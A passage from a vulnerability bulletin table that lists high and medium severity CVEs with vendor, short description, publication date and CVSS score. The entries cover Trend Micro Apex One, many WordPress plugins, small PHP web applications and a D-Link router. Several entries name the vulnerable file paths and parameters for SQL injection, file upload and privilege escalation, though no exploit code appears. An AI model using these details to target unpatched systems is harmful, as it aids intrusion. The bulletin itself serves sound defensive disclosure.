A LogServer link following vulnerability in Trend Micro Apex One could allow a local attacker to escalate privileges on affected installations. This vulnerability is similar to, but not identical to CVE-2024-52049. Please note: an attacker must first obtain the ability to execute low-privileged code on the target system in order to exploit this vulnerability. | 2024-12-31 | 7.8 | CVE-2024-52048 |
| Trend Micro, Inc.--Trend Micro Apex One |
A LogServer link following vulnerability in Trend Micro Apex One could allow a local attacker to escalate privileges on affected installations. This vulnerability is similar to, but not identical to CVE-2024-52048. Please note: an attacker must first obtain the ability to execute low-privileged code on the target system in order to exploit this vulnerability. | 2024-12-31 | 7.8 | CVE-2024-52049 |
| Trend Micro, Inc.--Trend Micro Apex One |
A LogServer arbitrary file creation vulnerability in Trend Micro Apex One could allow a local attacker to escalate privileges on affected installations. Please note: an attacker must first obtain the ability to execute low-privileged code on the target system in order to exploit this vulnerability. | 2024-12-31 | 7.8 | CVE-2024-52050 |
| Trend Micro, Inc.--Trend Micro Apex One |
An engine link following vulnerability in Trend Micro Apex One could allow a local attacker to escalate privileges on affected installations. Please note: an attacker must first obtain the ability to execute low-privileged code on the target system in order to exploit this vulnerability. | 2024-12-31 | 7.8 | CVE-2024-55631 |
| Trend Micro, Inc.--Trend Micro Apex One |
A security agent link following vulnerability in Trend Micro Apex One could allow a local attacker to escalate privileges on affected installations. Please note: an attacker must first obtain the ability to execute low-privileged code on the target system in order to exploit this vulnerability. | 2024-12-31 | 7.8 | CVE-2024-55632 |
| Trend Micro, Inc.--Trend Micro Apex One |
An origin validation error vulnerability in Trend Micro Apex One could allow a local attacker to escalate privileges on affected installations. Please note: an attacker must first obtain the ability to execute low-privileged code on the target system in order to exploit this vulnerability. | 2024-12-31 | 7.8 | CVE-2024-55917 |
| TrueWinter--simofa |
Simofa is a tool to help automate static website building and deployment. Prior to version 0.2.7, due to a design mistake in the RouteLoader class, some API routes may be publicly accessible when they should require authentication. This vulnerability has been patched in v0.2.7. | 2024-12-30 | 10 | CVE-2024-56799 |
| Unknown--Hunk Companion |
The Hunk Companion WordPress plugin before 1.9.0 does not correctly authorize some REST API endpoints, allowing unauthenticated requests to install and activate arbitrary Hunk Companion WordPress plugin before 1.9.0 from the WordPress.org repo, including vulnerable Hunk Companion WordPress plugin before 1.9.0 that have been closed. | 2024-12-31 | 9.8 | CVE-2024-11972 |
| VibeThemes--VibeBP |
Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in VibeThemes VibeBP allows SQL Injection.This issue affects VibeBP: from n/a before 1.9.9.7.7. | 2024-12-31 | 9.3 | CVE-2024-56039 |
| VibeThemes--VibeBP |
Incorrect Privilege Assignment vulnerability in VibeThemes VibeBP allows Privilege Escalation.This issue affects VibeBP: from n/a through 1.9.9.4.1. | 2024-12-31 | 9.8 | CVE-2024-56040 |
| VibeThemes--VibeBP |
Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in VibeThemes VibeBP allows SQL Injection.This issue affects VibeBP: from n/a before 1.9.9.5.1. | 2024-12-31 | 8.5 | CVE-2024-56041 |
| VibeThemes--WPLMS |
Unrestricted Upload of File with Dangerous Type vulnerability in VibeThemes WPLMS allows Upload a Web Shell to a Web Server.This issue affects WPLMS: from n/a through 1.9.9. | 2024-12-31 | 10 | CVE-2024-56046 |
| VibeThemes--WPLMS |
Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in VibeThemes WPLMS allows SQL Injection.This issue affects WPLMS: from n/a before 1.9.9.5.3. | 2024-12-31 | 9.3 | CVE-2024-56042 |
| VibeThemes--WPLMS |
Incorrect Privilege Assignment vulnerability in VibeThemes WPLMS allows Privilege Escalation.This issue affects WPLMS: from n/a through 1.9.9. | 2024-12-31 | 9.8 | CVE-2024-56043 |
| VibeThemes--WPLMS |
Authentication Bypass Using an Alternate Path or Channel vulnerability in VibeThemes WPLMS allows Authentication Bypass.This issue affects WPLMS: from n/a through 1.9.9. | 2024-12-31 | 9.8 | CVE-2024-56044 |
| VibeThemes--WPLMS |
Path Traversal: '.../...//' vulnerability in VibeThemes WPLMS allows Path Traversal.This issue affects WPLMS: from n/a before 1.9.9.5. | 2024-12-31 | 9.3 | CVE-2024-56045 |
| watchguard -- panda_dome |
Panda Security Dome Link Following Local Privilege Escalation Vulnerability. This vulnerability allows local attackers to escalate privileges on affected installations of Panda Security Dome. An attacker must first obtain the ability to execute low-privileged code on the target system in order to exploit this vulnerability. The specific flaw exists within the Hotspot Shield. By creating a junction, an attacker can abuse the application to delete arbitrary files. An attacker can leverage this vulnerability to escalate privileges and execute arbitrary code in the context of SYSTEM. Was ZDI-CAN-23478. | 2024-12-30 | 7.8 | CVE-2024-13043 |
| Webdeclic--WPMasterToolKit |
Unrestricted Upload of File with Dangerous Type vulnerability in Webdeclic WPMasterToolKit allows Upload a Web Shell to a Web Server.This issue affects WPMasterToolKit: from n/a through 1.13.1. | 2025-01-02 | 9.1 | CVE-2024-56249 |
| Webful Creations--Computer Repair Shop |
Missing Authorization vulnerability in Webful Creations Computer Repair Shop allows Privilege Escalation.This issue affects Computer Repair Shop: from n/a through 3.8119. | 2024-12-31 | 8.8 | CVE-2024-56061 |
| WordPress Monsters--Preloader by WordPress Monsters |
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in WordPress Monsters Preloader by WordPress Monsters allows Reflected XSS.This issue affects Preloader by WordPress Monsters: from n/a through 1.2.3. | 2025-01-02 | 7.1 | CVE-2024-56022 |
| WP Royal--Royal Elementor Addons |
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in WP Royal Royal Elementor Addons allows Reflected XSS.This issue affects Royal Elementor Addons: from n/a through 1.7.1001. | 2024-12-31 | 7.1 | CVE-2024-56226 |
| WP Travel--WP Travel |
Missing Authorization vulnerability in WP Travel WP Travel allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects WP Travel: from n/a through 7.8.0. | 2025-01-02 | 7.5 | CVE-2023-47224 |
| WPDeveloper--BetterLinks |
Missing Authorization vulnerability in WPDeveloper BetterLinks allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects BetterLinks: from n/a through 1.6.0. | 2025-01-02 | 7.3 | CVE-2023-45104 |
| WPFactory--Wishlist for WooCommerce: Multi Wishlists Per Customer |
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in WPFactory Wishlist for WooCommerce: Multi Wishlists Per Customer allows Reflected XSS.This issue affects Wishlist for WooCommerce: Multi Wishlists Per Customer: from n/a through 3.1.2. | 2024-12-31 | 7.1 | CVE-2024-56228 |
| WPWeb--WooCommerce PDF Vouchers |
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in WPWeb WooCommerce PDF Vouchers allows Reflected XSS.This issue affects WooCommerce PDF Vouchers: from n/a before 4.9.9. | 2024-12-31 | 7.1 | CVE-2024-56265 |
| Yonatan Reinberg of Social Ink--Sinking Dropdowns |
Cross-Site Request Forgery (CSRF) vulnerability in Yonatan Reinberg of Social Ink Sinking Dropdowns allows Privilege Escalation.This issue affects Sinking Dropdowns: from n/a through 1.25. | 2024-12-31 | 8.8 | CVE-2024-56204 |
| ZTE--ZENIC ONE R58 |
The ZENIC ONE R58 products by ZTE Corporation have a command injection vulnerability. An authenticated attacker can exploit this vulnerability to tamper with messages, inject malicious code, and subsequently launch attacks on related devices. | 2024-12-30 | 7.6 | CVE-2024-22063 |
Medium Vulnerabilities
| Primary Vendor -- Product |
Description | Published | CVSS Score | Source Info |
|---|---|---|---|---|
| 1000 Projects--Attendance Tracking Management System |
A vulnerability was found in 1000 Projects Attendance Tracking Management System 1.0. It has been classified as critical. Affected is the function attendance_report of the file /admin/report.php. The manipulation of the argument course_id leads to sql injection. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. | 2024-12-30 | 6.3 | CVE-2024-13037 |
| 1000 Projects--Beauty Parlour Management System |
A vulnerability was found in 1000 Projects Beauty Parlour Management System 1.0. It has been rated as critical. Affected by this issue is some unknown functionality of the file /admin/add-customer-services.php of the component Customer Detail Handler. The manipulation of the argument sids[] leads to sql injection. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. | 2024-12-31 | 6.3 | CVE-2024-13072 |
| 10Web--10Web Map Builder for Google Maps |
Missing Authorization vulnerability in 10Web 10Web Map Builder for Google Maps allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects 10Web Map Builder for Google Maps: from n/a through 1.0.73. | 2025-01-02 | 5.4 | CVE-2023-45272 |
| 10Web--10WebAnalytics |
Missing Authorization vulnerability in 10Web 10WebAnalytics allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects 10WebAnalytics: from n/a through 1.2.12. | 2025-01-02 | 4.3 | CVE-2023-47807 |
| 1Panel-dev--MaxKB |
MaxKB, which stands for Max Knowledge Base, is an open source knowledge base question-answering system based on a large language model and retrieval-augmented generation (RAG). Prior to version 1.9.0, a remote command execution vulnerability exists in the module of function library. The vulnerability allow privileged users to execute OS command in custom scripts. The vulnerability has been fixed in v1.9.0. | 2025-01-02 | 6.8 | CVE-2024-56137 |
| akashmalik--Scratch & Win Giveaways and Contests. Boost subscribers, traffic, repeat visits, referrals, sales and more |
The Scratch & Win - Giveaways and Contests. Boost subscribers, traffic, repeat visits, referrals, sales and more plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 2.7.1. This is due to missing nonce validation on the reset_installation() function. This makes it possible for unauthenticated attackers to reset the plugin's installation via a forged request granted they can trick a site administrator into performing an action such as clicking on a link. | 2025-01-04 | 5.4 | CVE-2024-12545 |
| Analytify--Analytify |
Missing Authorization vulnerability in Analytify.This issue affects Analytify: from n/a through 4.2.3. | 2025-01-02 | 6.5 | CVE-2022-45830 |
| Andy Fragen--Embed PDF Viewer |
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Andy Fragen Embed PDF Viewer allows Stored XSS.This issue affects Embed PDF Viewer: from n/a through 2.3.1. | 2024-12-31 | 5.9 | CVE-2024-56256 |
| Antabot--White-Jotter |
A vulnerability, which was classified as problematic, was found in Antabot White-Jotter up to 0.2.2. Affected is an unknown function of the file /admin/content/book of the component Edit Book Handler. The manipulation leads to server-side request forgery. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. | 2024-12-30 | 4.3 | CVE-2024-13029 |
| Apollo13Themes--Rife Free |
Cross-Site Request Forgery (CSRF) vulnerability in Apollo13Themes Rife Free allows Cross Site Request Forgery.This issue affects Rife Free: from n/a through 2.4.18. | 2025-01-02 | 4.3 | CVE-2024-37491 |
| AtomChat--AtomChat |
Missing Authorization vulnerability in AtomChat AtomChat allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects AtomChat: from n/a through 1.1.4. | 2025-01-02 | 5.3 | CVE-2023-46606 |
| AuRise Creative, SevenSpark--Contact Form 7 Dynamic Text Extension |
Cross-Site Request Forgery (CSRF) vulnerability in AuRise Creative, SevenSpark Contact Form 7 Dynamic Text Extension allows Cross Site Request Forgery.This issue affects Contact Form 7 Dynamic Text Extension: from n/a through 5.0.1. | 2024-12-31 | 4.3 | CVE-2024-56218 |
| Automattic--Newspack Newsletters |
Cross-Site Request Forgery (CSRF) vulnerability in Automattic Newspack Newsletters allows Cross Site Request Forgery.This issue affects Newspack Newsletters: from n/a through 2.13.2. | 2025-01-02 | 4.3 | CVE-2024-37242 |
| Automattic--WP Job Manager - Resume Manager |
Cross-Site Request Forgery (CSRF) vulnerability in Automattic WP Job Manager - Resume Manager allows Cross Site Request Forgery.This issue affects WP Job Manager - Resume Manager: from n/a through 2.1.0. | 2025-01-02 | 4.3 | CVE-2024-37241 |
| AWSM Innovations--WP Job Openings |
Missing Authorization vulnerability in AWSM Innovations WP Job Openings allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects WP Job Openings: from n/a through 3.4.1. | 2025-01-02 | 5.3 | CVE-2023-45061 |
| AyeCode - WP Business Directory Plugins--GeoDirectory |
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in AyeCode - WP Business Directory Plugins GeoDirectory allows Stored XSS.This issue affects GeoDirectory: from n/a through 2.3.84. | 2025-01-02 | 6.5 | CVE-2024-56259 |
| AyeCode--AyeCode Connect |
Missing Authorization vulnerability in AyeCode AyeCode Connect allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects AyeCode Connect: from n/a through 1.3.8. | 2025-01-02 | 4.3 | CVE-2024-56255 |
| basecamp--trix |
Trix is a what-you-see-is-what-you-get rich text editor for everyday writing. Versions prior to 2.1.12 are vulnerable to cross-site scripting when pasting malicious code in the link field. An attacker could trick the user to copy&paste a malicious `javascript:` URL as a link that would execute arbitrary JavaScript code within the context of the user's session, potentially leading to unauthorized actions being performed or sensitive information being disclosed. Users should upgrade to Trix editor version 2.1.12 or later to receive a patch. In addition to upgrading, affected users can disallow browsers that don't support a Content Security Policy (CSP) as a workaround for this and other cross-site scripting vulnerabilities. Set CSP policies such as script-src 'self' to ensure that only scripts hosted on the same origin are executed, and explicitly prohibit inline scripts using script-src-elem. | 2025-01-03 | 5.3 | CVE-2025-21610 |
| Beee--ACF City Selector |
Unrestricted Upload of File with Dangerous Type vulnerability in Beee ACF City Selector allows Upload a Web Shell to a Web Server.This issue affects ACF City Selector: from n/a through 1.14.0. | 2025-01-02 | 6.6 | CVE-2024-56264 |
| Beijing Yunfan Internet Technology--Yunfan Learning Examination System |
A vulnerability was found in Beijing Yunfan Internet Technology Yunfan Learning Examination System 1.9.2. It has been rated as critical. This issue affects some unknown processing of the file /doc.html. The manipulation leads to improper authorization. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. | 2025-01-02 | 5.3 | CVE-2024-13109 |
| Beijing Yunfan Internet Technology--Yunfan Learning Examination System |
A vulnerability classified as critical was found in Beijing Yunfan Internet Technology Yunfan Learning Examination System 1.9.2. Affected by this vulnerability is an unknown functionality of the file src/main/java/com/yf/exam/modules/sys/user/controller/SysUserControl of the component JWT Token Handler. The manipulation leads to improper authentication. The attack can be launched remotely. The complexity of an attack is rather high. The exploitation appears to be difficult. The exploit has been disclosed to the public and may be used. | 2025-01-02 | 5.6 | CVE-2024-13111 |
| Beijing Yunfan Internet Technology--Yunfan Learning Examination System |
A vulnerability classified as problematic has been found in Beijing Yunfan Internet Technology Yunfan Learning Examination System 1.9.2. Affected is an unknown function of the file src/main/java/com/yf/exam/modules/paper/controller/PaperController.java, of the component Exam Answer Handler. The manipulation leads to information disclosure. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. | 2025-01-02 | 4.3 | CVE-2024-13110 |
| BlazeThemes--Trendy News |
Cross-Site Request Forgery (CSRF) vulnerability in BlazeThemes Trendy News allows Cross Site Request Forgery.This issue affects Trendy News: from n/a through 1.0.15. | 2025-01-02 | 4.3 | CVE-2024-37473 |
| Blossom Themes--Blossom Shop |
Cross-Site Request Forgery (CSRF) vulnerability in Blossom Themes Blossom Shop allows Cross Site Request Forgery.This issue affects Blossom Shop: from n/a through 1.1.7. | 2025-01-02 | 4.3 | CVE-2024-37412 |
| Blossom Themes--Vandana Lite |
Cross-Site Request Forgery (CSRF) vulnerability in Blossom Themes Vandana Lite allows Cross Site Request Forgery.This issue affects Vandana Lite: from n/a through 1.1.9. | 2025-01-02 | 4.3 | CVE-2024-37243 |
| Blossom Themes--Vilva |
Cross-Site Request Forgery (CSRF) vulnerability in Blossom Themes Vilva allows Cross Site Request Forgery.This issue affects Vilva: from n/a through 1.2.2. | 2025-01-02 | 4.3 | CVE-2024-37102 |
| BoldThemes--Bold Timeline Lite |
Missing Authorization vulnerability in BoldThemes Bold Timeline Lite allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Bold Timeline Lite: from n/a through 1.1.9. | 2025-01-02 | 4.3 | CVE-2023-45110 |
| BUDDYBOSS LLC--BuddyBoss Theme |
Cross-Site Request Forgery (CSRF) vulnerability in BUDDYBOSS LLC BuddyBoss Theme allows Cross Site Request Forgery.This issue affects BuddyBoss Theme: from n/a through 2.4.61. | 2025-01-02 | 5.4 | CVE-2024-37925 |
| Campcodes--Project Management System |
A vulnerability was found in Campcodes Project Management System 1.0. It has been declared as critical. This vulnerability affects unknown code of the file /forms/update_forms.php?action=change_pic2&id=4. The manipulation of the argument file leads to unrestricted upload. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. | 2025-01-04 | 6.3 | CVE-2025-0213 |
| Campcodes--School Faculty Scheduling System |
A vulnerability was found in Campcodes School Faculty Scheduling System 1.0 and classified as critical. Affected by this issue is some unknown functionality of the file /admin/index.php. The manipulation of the argument page leads to file inclusion. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. | 2025-01-04 | 6.3 | CVE-2025-0211 |
| Campcodes--Student Grading System |
A vulnerability was found in Campcodes Student Grading System 1.0. It has been classified as critical. This affects an unknown part of the file /view_students.php. The manipulation of the argument id leads to sql injection. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. | 2025-01-04 | 6.3 | CVE-2025-0212 |
| Coachify--Coachify |
Cross-Site Request Forgery (CSRF) vulnerability in Coachify Coachify allows Cross Site Request Forgery.This issue affects Coachify: from n/a through 1.0.7. | 2025-01-02 | 4.3 | CVE-2024-37417 |
| CoCart Headless, LLC--CoCart Headless ecommerce |
Missing Authorization vulnerability in CoCart Headless, LLC CoCart - Headless ecommerce allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects CoCart - Headless ecommerce: from n/a through 3.11.2. | 2025-01-02 | 5.3 | CVE-2023-47241 |
| code-projects--Chat System |
A vulnerability has been found in code-projects Chat System 1.0 and classified as critical. This vulnerability affects unknown code of the file /admin/update_user.php. The manipulation of the argument id leads to sql injection. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. | 2024-12-30 | 6.3 | CVE-2024-13035 |
| code-projects--Chat System |
A vulnerability was found in code-projects Chat System 1.0 and classified as critical. This issue affects some unknown processing of the file /admin/update_room.php. The manipulation of the argument id/name/password leads to sql injection. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. | 2024-12-30 | 6.3 | CVE-2024-13036 |
| code-projects--Chat System |
A vulnerability, which was classified as critical, was found in code-projects Chat System 1.0. Affected is an unknown function of the file /admin/deleteuser.php. The manipulation of the argument id leads to sql injection. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. | 2025-01-02 | 6.3 | CVE-2025-0171 |
| code-projects--Chat System |
A vulnerability has been found in code-projects Chat System 1.0 and classified as critical. Affected by this vulnerability is an unknown functionality of the file /admin/deleteroom.php. The manipulation of the argument id leads to sql injection. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. | 2025-01-02 | 6.3 | CVE-2025-0172 |
| code-projects--Job Recruitment |
A vulnerability classified as critical was found in code-projects Job Recruitment 1.0. This vulnerability affects unknown code of the file /_parse/_call_job/search_ajax.php of the component Job Post Handler. The manipulation of the argument n leads to sql injection. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. | 2025-01-02 | 6.3 | CVE-2024-13092 |
| code-projects--Job Recruitment |
A vulnerability, which was classified as critical, has been found in code-projects Job Recruitment 1.0. This issue affects some unknown processing of the file /_parse/_call_main_search_ajax.php of the component Seeker Profile Handler. The manipulation of the argument s1 leads to sql injection. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. | 2025-01-02 | 6.3 | CVE-2024-13093 |
| code-projects--Job Recruitment |
A vulnerability classified as critical has been found in code-projects Job Recruitment 1.0. This affects an unknown part of the file /_parse/_feedback_system.php. The manipulation of the argument person leads to sql injection. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. | 2025-01-01 | 6.3 | CVE-2025-0168 |
| code-projects--Online Shoe Store |
A vulnerability was found in code-projects Online Shoe Store 1.0. It has been rated as critical. This issue affects some unknown processing of the file /details.php. The manipulation of the argument id leads to sql injection. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. | 2025-01-04 | 6.3 | CVE-2025-0204 |
| code-projects--Online Shoe Store |
A vulnerability classified as critical has been found in code-projects Online Shoe Store 1.0. Affected is an unknown function of the file /details2.php. The manipulation of the argument id leads to sql injection. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. | 2025-01-04 | 6.3 | CVE-2025-0205 |
| code-projects--Online Shoe Store |
A vulnerability, which was classified as critical, was found in code-projects Online Shoe Store 1.0. This affects an unknown part of the file /summary.php. The manipulation of the argument tid leads to sql injection. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. | 2025-01-04 | 6.3 | CVE-2025-0208 |
| code-projects--Online Shoe Store |
A vulnerability classified as critical was found in code-projects Online Shoe Store 1.0. Affected by this vulnerability is an unknown functionality of the file /admin/index.php. The manipulation leads to improper access controls. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. | 2025-01-04 | 5.3 | CVE-2025-0206 |
| code-projects--Point of Sales and Inventory Management System |
A vulnerability was found in code-projects Point of Sales and Inventory Management System 1.0. It has been classified as critical. This affects an unknown part of the file /user/search_result2.php of the component Parameter Handler. The manipulation of the argument search leads to sql injection. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. | 2025-01-03 | 6.3 | CVE-2025-0174 |
| code-projects--Point of Sales and Inventory Management System |
A vulnerability was found in code-projects Point of Sales and Inventory Management System 1.0. It has been rated as critical. This issue affects some unknown processing of the file /user/add_cart.php. The manipulation of the argument id/qty leads to sql injection. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. | 2025-01-03 | 6.3 | CVE-2025-0176 |
| code-projects--Point of Sales and Inventory Management System |
A vulnerability was found in code-projects Point of Sales and Inventory Management System 1.0. It has been rated as critical. Affected by this issue is some unknown functionality of the file /user/del_product.php. The manipulation of the argument id leads to sql injection. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. | 2025-01-03 | 6.3 | CVE-2025-0195 |
| code-projects--Point of Sales and Inventory Management System |
A vulnerability classified as critical has been found in code-projects Point of Sales and Inventory Management System 1.0. This affects an unknown part of the file /user/plist.php. The manipulation of the argument cat leads to sql injection. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. | 2025-01-03 | 6.3 | CVE-2025-0196 |
| code-projects--Point of Sales and Inventory Management System |
A vulnerability classified as critical was found in code-projects Point of Sales and Inventory Management System 1.0. This vulnerability affects unknown code of the file /user/search.php. The manipulation of the argument name leads to sql injection. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. | 2025-01-03 | 6.3 | CVE-2025-0197 |
| code-projects--Point of Sales and Inventory Management System |
A vulnerability, which was classified as critical, has been found in code-projects Point of Sales and Inventory Management System 1.0. This issue affects some unknown processing of the file /user/search_result.php. The manipulation of the argument id leads to sql injection. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. | 2025-01-03 | 6.3 | CVE-2025-0198 |
| code-projects--Point of Sales and Inventory Management System |
A vulnerability, which was classified as critical, was found in code-projects Point of Sales and Inventory Management System 1.0. Affected is an unknown function of the file /user/minus_cart.php. The manipulation of the argument id leads to sql injection. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. | 2025-01-03 | 6.3 | CVE-2025-0199 |
| code-projects--Point of Sales and Inventory Management System |
A vulnerability has been found in code-projects Point of Sales and Inventory Management System 1.0 and classified as critical. Affected by this vulnerability is an unknown functionality of the file /user/search_num.php. The manipulation of the argument search leads to sql injection. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. | 2025-01-04 | 6.3 | CVE-2025-0200 |
| code-projects--Point of Sales and Inventory Management System |
A vulnerability was found in code-projects Point of Sales and Inventory Management System 1.0 and classified as critical. Affected by this issue is some unknown functionality of the file /user/update_account.php. The manipulation of the argument username leads to sql injection. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. | 2025-01-04 | 6.3 | CVE-2025-0201 |
| code-projects--Responsive Hotel Site |
A vulnerability, which was classified as critical, was found in code-projects Responsive Hotel Site 1.0. Affected is an unknown function of the file /admin/print.php. The manipulation of the argument pid leads to sql injection. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. | 2025-01-05 | 6.3 | CVE-2025-0230 |
| code-projects--Simple Chat System |
A vulnerability was found in code-projects Simple Chat System 1.0. It has been rated as critical. Affected by this issue is some unknown functionality of the file /add_user.php. The manipulation of the argument name/email/password/number leads to sql injection. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. | 2024-12-30 | 6.3 | CVE-2024-13039 |
| code-projects--Student Management System |
A vulnerability was found in code-projects Student Management System 1.0. It has been declared as critical. This vulnerability affects the function showSubject1 of the file /config/DbFunction.php. The manipulation of the argument sid leads to sql injection. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. Other parameters might be affected as well. | 2025-01-04 | 6.3 | CVE-2025-0203 |
| code-projects--Travel Management System |
A vulnerability, which was classified as critical, has been found in code-projects Travel Management System 1.0. This issue affects some unknown processing of the file /enquiry.php. The manipulation of the argument pid/t1/t2/t3/t4/t5/t6/t7 leads to sql injection. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. | 2025-01-05 | 6.3 | CVE-2025-0229 |
| CodeAstro--Online Food Ordering System |
A vulnerability was found in CodeAstro Online Food Ordering System 1.0. It has been declared as critical. Affected by this vulnerability is an unknown functionality of the file /admin/update_users.php of the component Update User Page. The manipulation of the argument user_upd leads to sql injection. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. | 2024-12-31 | 6.3 | CVE-2024-13070 |
| CodeAstro--Online Food Ordering System |
A vulnerability was found in CodeAstro Online Food Ordering System 1.0 and classified as critical. This issue affects some unknown processing of the file /admin/all_users.php of the component All Users Page. The manipulation leads to improper access controls. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. | 2024-12-31 | 5.3 | CVE-2024-13067 |
| Codebard--CodeBard Help Desk |
Cross-Site Request Forgery (CSRF) vulnerability in Codebard CodeBard Help Desk allows Cross Site Request Forgery.This issue affects CodeBard Help Desk: from n/a through 1.1.1. | 2024-12-31 | 5.4 | CVE-2024-56222 |
| codedrafty--Mediabay |
Missing Authorization vulnerability in codedrafty Mediabay allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Mediabay: from n/a through 1.6. | 2025-01-02 | 4.3 | CVE-2023-46612 |
| CodePeople--Appointment Hour Booking |
Missing Authorization vulnerability in CodePeople Appointment Hour Booking allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Appointment Hour Booking: from n/a through 1.4.23. | 2025-01-02 | 5.3 | CVE-2023-45649 |
| Codezips--Blood Bank Management System |
A vulnerability was found in Codezips Blood Bank Management System 1.0 and classified as critical. Affected by this issue is some unknown functionality of the file /successadmin.php. The manipulation of the argument psw leads to sql injection. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. | 2025-01-05 | 6.3 | CVE-2025-0232 |
| Codezips--Gym Management System |
A vulnerability has been found in Codezips Gym Management System 1.0 and classified as critical. Affected by this vulnerability is an unknown functionality of the file /dashboard/admin/submit_payments.php. The manipulation of the argument m_id leads to sql injection. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. | 2025-01-05 | 6.3 | CVE-2025-0231 |
| Contest Gallery--Contest Gallery |
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Contest Gallery Contest Gallery allows Stored XSS.This issue affects Contest Gallery: from n/a through 24.0.3. | 2025-01-02 | 5.9 | CVE-2024-56237 |
| ConvertCalculator--ConvertCalculator for WordPress |
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in ConvertCalculator ConvertCalculator for WordPress allows Stored XSS.This issue affects ConvertCalculator for WordPress: from n/a through 1.1.1. | 2025-01-02 | 6.5 | CVE-2024-56302 |
| CoolPlugins--Coins MarketCap |
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in CoolPlugins Coins MarketCap allows DOM-Based XSS.This issue affects Coins MarketCap: from n/a through 5.5.8. | 2025-01-02 | 6.5 | CVE-2024-56257 |
| CoSchedule--Headline Analyzer |
Missing Authorization vulnerability in CoSchedule Headline Analyzer allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Headline Analyzer: from n/a through 1.3.1. | 2025-01-02 | 6.5 | CVE-2023-46195 |
| Coupon Plugin--Coupon |
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Coupon Plugin Coupon allows DOM-Based XSS.This issue affects Coupon: from n/a through 1.2.1. | 2024-12-31 | 6.5 | CVE-2024-56235 |
| CreativeThemes--Blocksy |
Cross-Site Request Forgery (CSRF) vulnerability in CreativeThemes Blocksy allows Cross Site Request Forgery.This issue affects Blocksy: from n/a through 2.0.22. | 2025-01-02 | 5.4 | CVE-2024-37469 |
| Creativthemes--Point |
Cross-Site Request Forgery (CSRF) vulnerability in Creativthemes Point allows Cross Site Request Forgery.This issue affects Point: from n/a through 1.1. | 2025-01-02 | 4.3 | CVE-2024-37931 |
| CusRev--Customer Reviews for WooCommerce |
Missing Authorization vulnerability in CusRev Customer Reviews for WooCommerce allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Customer Reviews for WooCommerce: from n/a through 5.36.0. | 2025-01-02 | 4.3 | CVE-2023-45101 |
| Cyberlord92--Broken Link Checker | Finder |
Missing Authorization vulnerability in Cyberlord92 Broken Link Checker | Finder allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Broken Link Checker | Finder: from n/a through 2.4.2. | 2025-01-02 | 5.3 | CVE-2023-46082 |
| D-Link--DIR-816 A2 |
A vulnerability classified as critical was found in D-Link DIR-816 A2 1.10CNB05_R1B011D88210. This vulnerability affects unknown code of the file /goform/DDNS of the component DDNS Service. The manipulation leads to improper access controls. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. | 2025-01-02 | 5.3 | CVE-2024-13102 |
| D-Link--DIR-816 A2 |
